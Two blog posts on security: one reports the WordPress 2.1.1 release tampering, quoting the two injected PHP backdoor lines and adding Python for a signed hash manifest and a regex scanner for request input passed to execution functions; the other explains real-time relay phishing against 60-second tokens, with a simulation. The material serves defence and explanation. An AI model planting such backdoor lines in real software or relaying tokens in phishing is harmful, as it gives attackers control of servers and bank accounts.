Serious WordPress Security Hole in v2.1.1 March 3rd, 2007
Someone cracked the WordPress servers and inserted malicious code into 2 of the source files for the popular open source blog software.
If you are running WordPress v2.1.1 you need to upgrade now! Read their announcement here. This is more serious than your normal round of ‘someone found another way to exploit sloppy PHP code’ — someone was able to gain access to their download server, insert code and recreate the distribution file.
They have never had any kind of file integrity checking (GPG signatures are commonly used in open source projects), and I think it is high time they implemented them.
They are a bit light on details of the inserted code. It exists in 2 files, feed.php and theme.php. Someone inserted this line into feed.php:
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
And in theme.php:
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
What this means is that someone passing the argument ix to feed.php or iz to theme.php could execute PHP code or shell commands on the server with the permissions of the running web server. It is as if you opened up a guest account on your system for anyone to use. It could be used to launch spam relays, potentially exploit other security holes to gain root access, or trash your blog.
The WordPress team needs to take a very serious look at their development process and security procedures. At the least they need to designate someone as the release manager and have them GPG sign the release files so that those of us downloading their software have some level of confidence that it hasn’t been compromised.
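The kind of integrity check the post is asking for, as an added example that is not WordPress's own code: the release manager publishes a manifest of SHA-256 hashes for every file in the distribution (and signs it with GPG, so the key never sits on the download server), and anyone who downloads the archive compares the installed tree against it. The sample source files below are constructed stand-ins; the two injected lines are the ones quoted above, appended to otherwise clean copies. A second, weaker check greps PHP files for request parameters flowing straight into calls whose names suggest evaluation or command execution; the function names it matches are those from this incident plus the usual PHP execution primitives.

```python
"""Release integrity check for a WordPress-style source tree (added example).

Models a signed release manifest: path -> SHA-256 published by the release
manager, compared against the files actually installed.  Everything here is
constructed for the demonstration; it is not WordPress code.
"""
import hashlib
import os
import re
import tempfile

# Constructed clean sources (stand-ins for the real files).
CLEAN_FILES = {
    "wp-includes/feed.php": "<?php\nfunction get_bloginfo_rss($show = '') {\n    return $show;\n}\n",
    "wp-includes/theme.php": "<?php\nfunction get_theme_root() {\n    return 'themes';\n}\n",
}

# The lines inserted into the 2.1.1 download, as quoted in the advisory.
INJECTED = {
    "wp-includes/feed.php": 'if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }\n',
    "wp-includes/theme.php": 'if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }\n',
}

# Request input passed directly to a call that evaluates code or runs commands.
# The first two names are the functions used in this incident; the rest are
# PHP's standard execution primitives.
SUSPICIOUS = re.compile(
    r"(phpfilter|mcommand|eval|system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST)\[",
    re.IGNORECASE,
)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """What the release manager would publish (and GPG-sign): relative path -> sha256."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify_tree(root, manifest):
    """Compare an installed tree against a trusted manifest.

    Returns the files whose contents changed, files the manifest lists but the
    tree lacks, and files present in the tree that the release never shipped
    (a dropped-in backdoor file shows up here)."""
    actual = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in actual and actual[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in actual),
        "unexpected": sorted(p for p in actual if p not in manifest),
    }


def find_suspicious_lines(root):
    """Heuristic scan of PHP files: (relative path, line number, line) for each hit."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as f:
                for lineno, line in enumerate(f, 1):
                    if SUSPICIOUS.search(line):
                        hits.append((rel, lineno, line.strip()))
    return hits


def write_tree(root, files):
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(content)


def demo():
    """Build a clean release and a tampered copy, then check both against the manifest."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, tampered = os.path.join(tmp, "clean"), os.path.join(tmp, "tampered")
        write_tree(clean, CLEAN_FILES)
        manifest = build_manifest(clean)  # the trusted, published list
        write_tree(tampered, {p: c + INJECTED.get(p, "") for p, c in CLEAN_FILES.items()})
        return {
            "clean": verify_tree(clean, manifest),
            "tampered": verify_tree(tampered, manifest),
            "hits": find_suspicious_lines(tampered),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The manifest is only worth something if it is authenticated out of band: an attacker who can rewrite the distribution archive on the download server can just as easily regenerate an unsigned hash list to match. That is the point of having a named release manager sign it with a key that lives on their own machine, which is what the post is calling for.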
Man-in-the-Middle Phishing July 11th, 2006
Sounds like some kind of weird casting technique, doesn’t it? Actually it is, in the realm of scammers trying to access your bank accounts. Phishing involves the scammer sending the target an email that looks like it came from their bank. It links to a fake copy of the bank’s website and records the details that people enter. Usually it will display an error and forward the user to the real site.
Now, according to this report, they are getting more sophisticated. Some banks are now requiring 2-factor authentication; instead of only a username and password you also need a secure token that changes every minute. Many use the RSA SecurID system to generate the tokens every 60 seconds. Instead of storing the target’s information for later use, the scammer now has only 1 minute to use the information to access the account. So they make a connection to the bank and report success or failure to the user in real time. This is commonly called a Man in the Middle attack, where the target is actually communicating with his bank, but there is someone in the middle listening in, or passing the messages in each direction.
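To see why a token that changes every 60 seconds does not stop a real-time relay, here is an added simulation that is not part of the original post. RSA SecurID's algorithm is proprietary, so this uses an HOTP/TOTP-style stand-in (an HMAC over a time counter with RFC 4226-style truncation) with a 60-second step; the seed and the timestamps are constructed. The bank-side check also accepts one step of clock drift either side, as most time-based verifiers do, which is itself an assumption of this example.

```python
"""A 60-second token versus a real-time relay (added example, not from the post).

Stand-in for a time-based hardware token: HMAC-SHA1 over a 60-second counter,
truncated to six digits in the RFC 4226 style.  SecurID's real algorithm is
proprietary; the property shown here only depends on the token being valid
for a window of time rather than for one particular session.
"""
import hashlib
import hmac
import struct

SECRET = b"constructed-demo-seed-not-a-real-key"  # shared by token and bank
STEP = 60  # seconds each token is displayed


def token_at(secret, now, step=STEP, digits=6):
    """Code shown on the user's device at time `now` (seconds since epoch)."""
    counter = int(now) // step
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % (10 ** digits))


def bank_accepts(secret, code, now, step=STEP, skew=1):
    """Bank-side check: the current step plus `skew` steps either side for clock
    drift.  Nothing in `code` says which site the user typed it into."""
    counter = int(now) // step
    for c in range(counter - skew, counter + skew + 1):
        if hmac.compare_digest(token_at(secret, c * step, step), code):
            return True
    return False


def relay_scenario(delay_seconds, t0=1_152_600_000):
    """The user types the current token into the fake site at t0; the relaying
    party submits the same code to the bank `delay_seconds` later.
    Returns True if the bank accepts it.  t0 is a constructed timestamp."""
    code = token_at(SECRET, t0)
    return bank_accepts(SECRET, code, t0 + delay_seconds)


if __name__ == "__main__":
    for delay in (10, 90, 200):
        print("relayed after %3ds -> %s" % (delay, "accepted" if relay_scenario(delay) else "rejected"))
```

A token relayed within a few seconds is indistinguishable from one typed straight into the bank's site, and the drift allowance stretches the usable window past the advertised minute. The code expires the stolen value quickly, which is what defeats the old store-and-reuse phishing, but it carries nothing that ties it to the site or the transaction it was meant for, and that gap is exactly what the real-time relay exploits.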
Be paranoid, it’s a nasty world out there.